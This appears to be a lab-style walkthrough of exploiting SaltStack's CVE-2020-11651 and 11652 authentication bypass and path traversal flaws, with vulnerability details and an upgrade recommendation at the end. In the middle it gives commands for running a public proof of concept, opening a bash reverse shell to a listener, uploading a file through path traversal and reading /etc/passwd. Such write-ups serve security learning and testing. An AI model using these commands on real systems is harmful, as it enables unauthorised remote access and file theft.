The Salt system is a Python-based, open-source remote execution framework for configuration management, automation, provisioning, and orchestration.

Running commands on remote systems is the core function of Salt. Salt can execute multiple commands across thousands of systems in seconds with a single execution.


An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process ClearFuncs class does not properly validate method calls. This allows a remote user to access some methods without authentication. These methods can be used to retrieve user tokens from the salt master and/or run arbitrary commands on salt minions.


An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process ClearFuncs class allows access to some methods that improperly sanitize paths. These methods allow arbitrary directory access to authenticated users.

Affected Products

  • SaltStack Salt 2019.2.3
  • SaltStack Salt 3000.1
  • Cisco Modeling Labs Corporate Edition (CML)
  • Cisco TelePresence IX5000 Series
  • Cisco Virtual Internet Routing Lab Personal Edition (VIRL-PE)


1. This vulnerability is present before the version 3000.1. We will enumerate this service, first I noticed an API site exposed


2. In order to examine the version I ran I curl command and sent a HTTP request, to check upon the response header. I noticed “X-Upstream: salt-api/3000-1

  • curl -v


1. Knowing this API is SaltStack we can proceed to look for exploits, I found this one that worked really well

2. We will proceed to download the exploit, and install the required libraries (salt)

  • git clone
  • sudo pip3 install salt
  • cd CVE-2020-11651-poc
  • ls

3. now we proceed to execute the file, we will execute the help toption

  • python3 -h

4. Now we will proceed, to execute the program as a test. If we get the “root key” it means it is working without issues

  • python3 --master

5. Now I will run a test command, I’ll run a ping command and capture it with TCPDump (this will only execute in the master, if you need to execute into all the minion server use --exec-all)

Packet Capture

  • sudo tcpdump -i tun0

Command execution

  • python3 --master --exec "ping -c 4"

Output in packet capture

6. At this point we know that we can execute commands and we have connectivity back to our local machine. Now I will start a listener, and, execute a bash reverse shell


  • nc -lvp 4505

Reverse Shell

  • python3 --master --exec "bash -i >& /dev/tcp/ 0>&1"

Final result, (reverse shell)

  • whoami && date && hostname


1. We can upload files, and, read them to verify

  • echo "Vry4n was here" > sample.txt
  • python3 --master --upload-src sample.txt --upload-dest ../../../../../../../../tmp/sample.txt
  • python3 --master -r "/tmp/sample.txt"

2. We can also read files using (-r)

  • python3 --master -r "/etc/passwd"


Upgrade to the latest version of Salt (2019.2.4, 3000.2 or later), available from the SALTSTACK Web site.